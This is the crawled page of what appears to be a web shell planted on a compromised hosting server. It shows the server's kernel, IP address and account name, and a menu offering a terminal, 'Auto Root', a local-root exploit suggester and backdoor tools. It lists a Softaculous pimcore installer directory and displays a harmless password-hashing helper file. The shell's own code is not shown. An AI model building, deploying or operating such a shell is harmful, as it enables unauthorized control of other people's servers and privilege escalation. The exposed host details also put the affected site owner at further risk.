Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
pimcore /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php53
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php56
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php71
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php81
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
php82
[ DIR ]
drwxr-xr-x
2025-08-15 20:01
.htaccess
840
B
-rwxr-xr-x
2022-02-18 06:03
bundles.php
124
B
-rwxr-xr-x
2024-12-11 04:48
config.yaml
4.03
KB
-rwxr-xr-x
2024-12-11 04:48
database.yaml
235
B
-rwxr-xr-x
2021-12-23 05:18
edit.php
4.45
KB
-rwxr-xr-x
2025-03-12 08:41
edit.xml
433
B
-rwxr-xr-x
2021-12-23 05:18
extend.php
10.28
KB
-rwxr-xr-x
2025-03-12 08:41
fileindex.php
291
B
-rwxr-xr-x
2024-12-11 04:48
import.php
4.46
KB
-rwxr-xr-x
2025-03-12 08:41
info.xml
3.65
KB
-rwxr-xr-x
2025-03-12 04:30
install.js
921
B
-rwxr-xr-x
2021-12-23 05:18
install.php
10.05
KB
-rwxr-xr-x
2025-03-12 08:41
install.xml
627
B
-rwxr-xr-x
2021-12-23 05:18
md5
14.71
KB
-rwxr-xr-x
2025-03-12 08:41
notes.txt
3.6
KB
-rwxr-xr-x
2025-03-12 04:30
services.yaml
2.82
KB
-rwxr-xr-x
2021-12-23 05:18
update_pass.php
499
B
-rwxr-xr-x
2021-12-23 05:18
Save
Rename
<?php /** * A Compatibility library with PHP 5.5's simplified password hashing API. * * @author Anthony Ferrara <ircmaxell@php.net> * @license http://www.opensource.org/licenses/mit-license.html MIT License * @copyright 2012 The Authors */ @unlink('update_pass.php'); if (!defined('PASSWORD_BCRYPT')) { define('PASSWORD_BCRYPT', 1); define('PASSWORD_DEFAULT', PASSWORD_BCRYPT); } $resp = password_hash('[[admin_pass]]', PASSWORD_DEFAULT); echo '<update_pass>'.$resp.'</update_pass>'; ?>